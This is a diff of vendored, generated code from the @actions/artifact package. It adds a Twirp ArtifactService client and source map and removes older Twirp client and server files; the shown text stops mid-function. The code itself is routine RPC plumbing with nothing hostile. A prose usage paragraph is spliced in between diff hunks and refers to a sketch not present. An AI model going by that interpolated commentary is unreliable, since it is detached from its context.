+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/json", data);
+        return promise.then((data) => artifact_1.DeleteArtifactResponse.fromJson(data, {
+            ignoreUnknownFields: true,
+        }));
+    }
+}
+exports.ArtifactServiceClientJSON = ArtifactServiceClientJSON;
+class ArtifactServiceClientProtobuf {
+    constructor(rpc) {
+        this.rpc = rpc;
+        this.CreateArtifact.bind(this);
+        this.FinalizeArtifact.bind(this);
+        this.ListArtifacts.bind(this);
+        this.GetSignedArtifactURL.bind(this);
+        this.DeleteArtifact.bind(this);
+    }
+    CreateArtifact(request) {
+        const data = artifact_1.CreateArtifactRequest.toBinary(request);
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/protobuf", data);
+        return promise.then((data) => artifact_1.CreateArtifactResponse.fromBinary(data));
+    }
+    FinalizeArtifact(request) {
+        const data = artifact_1.FinalizeArtifactRequest.toBinary(request);
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/protobuf", data);
+        return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromBinary(data));
+    }
+    ListArtifacts(request) {
+        const data = artifact_1.ListArtifactsRequest.toBinary(request);
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/protobuf", data);
+        return promise.then((data) => artifact_1.ListArtifactsResponse.fromBinary(data));
+    }
+    GetSignedArtifactURL(request) {
+        const data = artifact_1.GetSignedArtifactURLRequest.toBinary(request);
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/protobuf", data);
+        return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromBinary(data));
+    }
+    DeleteArtifact(request) {
+        const data = artifact_1.DeleteArtifactRequest.toBinary(request);
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/protobuf", data);
+        return promise.then((data) => artifact_1.DeleteArtifactResponse.fromBinary(data));
+    }
+}
+exports.ArtifactServiceClientProtobuf = ArtifactServiceClientProtobuf;
+//# sourceMappingURL=artifact.twirp-client.js.map
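
With an Rpc implementation like the sketch above, the generated client is a thin wrapper: each method serializes with toJson, posts via rpc.request, and parses the reply with fromJson, exactly as the bodies above show. A brief usage sketch; the request field values are illustrative placeholders, and the field names should be checked against the generated artifact.d.ts:

    async function fetchSignedUrl(): Promise<string> {
        const client = new ArtifactServiceClientJSON(rpc); // rpc from the earlier sketch
        const res = await client.GetSignedArtifactURL({
            workflowRunBackendId: "run-backend-id",
            workflowJobRunBackendId: "job-backend-id",
            name: "my-artifact",
        });
        return res.signedUrl;
    }
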
1 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.js.map (generated, vendored, new file)
@@ -0,0 +1 @@
{"version":3,"file":"artifact.twirp-client.js","sourceRoot":"","sources":["../../../../../src/generated/results/api/v1/artifact.twirp-client.ts"],"names":[],"mappings":"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"}
48 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp.d.ts (generated, vendored)
@@ -1,48 +0,0 @@
-/// <reference types="node" />
-import { TwirpContext, TwirpServer } from "twirp-ts";
-import { CreateArtifactRequest, CreateArtifactResponse, FinalizeArtifactRequest, FinalizeArtifactResponse, ListArtifactsRequest, ListArtifactsResponse, GetSignedArtifactURLRequest, GetSignedArtifactURLResponse, DeleteArtifactRequest, DeleteArtifactResponse } from "./artifact";
-interface Rpc {
-    request(service: string, method: string, contentType: "application/json" | "application/protobuf", data: object | Uint8Array): Promise<object | Uint8Array>;
-}
-export interface ArtifactServiceClient {
-    CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
-    FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
-    ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
-    GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
-    DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
-}
-export declare class ArtifactServiceClientJSON implements ArtifactServiceClient {
-    private readonly rpc;
-    constructor(rpc: Rpc);
-    CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
-    FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
-    ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
-    GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
-    DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
-}
-export declare class ArtifactServiceClientProtobuf implements ArtifactServiceClient {
-    private readonly rpc;
-    constructor(rpc: Rpc);
-    CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
-    FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
-    ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
-    GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
-    DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
-}
-export interface ArtifactServiceTwirp<T extends TwirpContext = TwirpContext> {
-    CreateArtifact(ctx: T, request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
-    FinalizeArtifact(ctx: T, request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
-    ListArtifacts(ctx: T, request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
-    GetSignedArtifactURL(ctx: T, request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
-    DeleteArtifact(ctx: T, request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
-}
-export declare enum ArtifactServiceMethod {
-    CreateArtifact = "CreateArtifact",
-    FinalizeArtifact = "FinalizeArtifact",
-    ListArtifacts = "ListArtifacts",
-    GetSignedArtifactURL = "GetSignedArtifactURL",
-    DeleteArtifact = "DeleteArtifact"
-}
-export declare const ArtifactServiceMethodList: ArtifactServiceMethod[];
-export declare function createArtifactServiceServer<T extends TwirpContext = TwirpContext>(service: ArtifactServiceTwirp<T>): TwirpServer<ArtifactServiceTwirp<TwirpContext<import("http").IncomingMessage, import("http").ServerResponse<import("http").IncomingMessage>>>, T>;
-export {};
508 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp.js (generated, vendored)
@@ -1,508 +0,0 @@
"use strict";
|
|
||||||
var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {
|
|
||||||
function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }
|
|
||||||
return new (P || (P = Promise))(function (resolve, reject) {
|
|
||||||
function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }
|
|
||||||
function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }
|
|
||||||
function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }
|
|
||||||
step((generator = generator.apply(thisArg, _arguments || [])).next());
|
|
||||||
});
|
|
||||||
};
|
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
|
||||||
exports.createArtifactServiceServer = exports.ArtifactServiceMethodList = exports.ArtifactServiceMethod = exports.ArtifactServiceClientProtobuf = exports.ArtifactServiceClientJSON = void 0;
|
|
||||||
const twirp_ts_1 = require("twirp-ts");
|
|
||||||
const artifact_1 = require("./artifact");
|
|
||||||
class ArtifactServiceClientJSON {
|
|
||||||
constructor(rpc) {
|
|
||||||
this.rpc = rpc;
|
|
||||||
this.CreateArtifact.bind(this);
|
|
||||||
this.FinalizeArtifact.bind(this);
|
|
||||||
this.ListArtifacts.bind(this);
|
|
||||||
this.GetSignedArtifactURL.bind(this);
|
|
||||||
this.DeleteArtifact.bind(this);
|
|
||||||
}
|
|
||||||
CreateArtifact(request) {
|
|
||||||
const data = artifact_1.CreateArtifactRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.CreateArtifactResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
FinalizeArtifact(request) {
|
|
||||||
const data = artifact_1.FinalizeArtifactRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
ListArtifacts(request) {
|
|
||||||
const data = artifact_1.ListArtifactsRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.ListArtifactsResponse.fromJson(data, { ignoreUnknownFields: true }));
|
|
||||||
}
|
|
||||||
GetSignedArtifactURL(request) {
|
|
||||||
const data = artifact_1.GetSignedArtifactURLRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
DeleteArtifact(request) {
|
|
||||||
const data = artifact_1.DeleteArtifactRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.DeleteArtifactResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
exports.ArtifactServiceClientJSON = ArtifactServiceClientJSON;
|
|
||||||
class ArtifactServiceClientProtobuf {
|
|
||||||
constructor(rpc) {
|
|
||||||
this.rpc = rpc;
|
|
||||||
this.CreateArtifact.bind(this);
|
|
||||||
this.FinalizeArtifact.bind(this);
|
|
||||||
this.ListArtifacts.bind(this);
|
|
||||||
this.GetSignedArtifactURL.bind(this);
|
|
||||||
this.DeleteArtifact.bind(this);
|
|
||||||
}
|
|
||||||
CreateArtifact(request) {
|
|
||||||
const data = artifact_1.CreateArtifactRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.CreateArtifactResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
FinalizeArtifact(request) {
|
|
||||||
const data = artifact_1.FinalizeArtifactRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
ListArtifacts(request) {
|
|
||||||
const data = artifact_1.ListArtifactsRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.ListArtifactsResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
GetSignedArtifactURL(request) {
|
|
||||||
const data = artifact_1.GetSignedArtifactURLRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
DeleteArtifact(request) {
|
|
||||||
const data = artifact_1.DeleteArtifactRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.DeleteArtifactResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
exports.ArtifactServiceClientProtobuf = ArtifactServiceClientProtobuf;
|
|
||||||
var ArtifactServiceMethod;
|
|
||||||
(function (ArtifactServiceMethod) {
|
|
||||||
ArtifactServiceMethod["CreateArtifact"] = "CreateArtifact";
|
|
||||||
ArtifactServiceMethod["FinalizeArtifact"] = "FinalizeArtifact";
|
|
||||||
ArtifactServiceMethod["ListArtifacts"] = "ListArtifacts";
|
|
||||||
ArtifactServiceMethod["GetSignedArtifactURL"] = "GetSignedArtifactURL";
|
|
||||||
ArtifactServiceMethod["DeleteArtifact"] = "DeleteArtifact";
|
|
||||||
})(ArtifactServiceMethod || (exports.ArtifactServiceMethod = ArtifactServiceMethod = {}));
|
|
||||||
exports.ArtifactServiceMethodList = [
|
|
||||||
ArtifactServiceMethod.CreateArtifact,
|
|
||||||
ArtifactServiceMethod.FinalizeArtifact,
|
|
||||||
ArtifactServiceMethod.ListArtifacts,
|
|
||||||
ArtifactServiceMethod.GetSignedArtifactURL,
|
|
||||||
ArtifactServiceMethod.DeleteArtifact,
|
|
||||||
];
|
|
||||||
function createArtifactServiceServer(service) {
|
|
||||||
return new twirp_ts_1.TwirpServer({
|
|
||||||
service,
|
|
||||||
packageName: "github.actions.results.api.v1",
|
|
||||||
serviceName: "ArtifactService",
|
|
||||||
methodList: exports.ArtifactServiceMethodList,
|
|
||||||
matchRoute: matchArtifactServiceRoute,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
exports.createArtifactServiceServer = createArtifactServiceServer;
|
|
||||||
function matchArtifactServiceRoute(method, events) {
|
|
||||||
switch (method) {
|
|
||||||
case "CreateArtifact":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "CreateArtifact" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceCreateArtifactRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "FinalizeArtifact":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "FinalizeArtifact" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceFinalizeArtifactRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "ListArtifacts":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "ListArtifacts" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceListArtifactsRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "GetSignedArtifactURL":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "GetSignedArtifactURL" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceGetSignedArtifactURLRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "DeleteArtifact":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "DeleteArtifact" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceDeleteArtifactRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
default:
|
|
||||||
events.onNotFound();
|
|
||||||
const msg = `no handler found`;
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceCreateArtifactRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceCreateArtifactJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceCreateArtifactProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceFinalizeArtifactRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceFinalizeArtifactJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceFinalizeArtifactProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceListArtifactsRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceListArtifactsJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceListArtifactsProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceGetSignedArtifactURLRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceGetSignedArtifactURLJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceGetSignedArtifactURLProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceDeleteArtifactRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceDeleteArtifactJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceDeleteArtifactProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceCreateArtifactJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.CreateArtifactRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.CreateArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.CreateArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.CreateArtifactResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceFinalizeArtifactJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.FinalizeArtifactRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
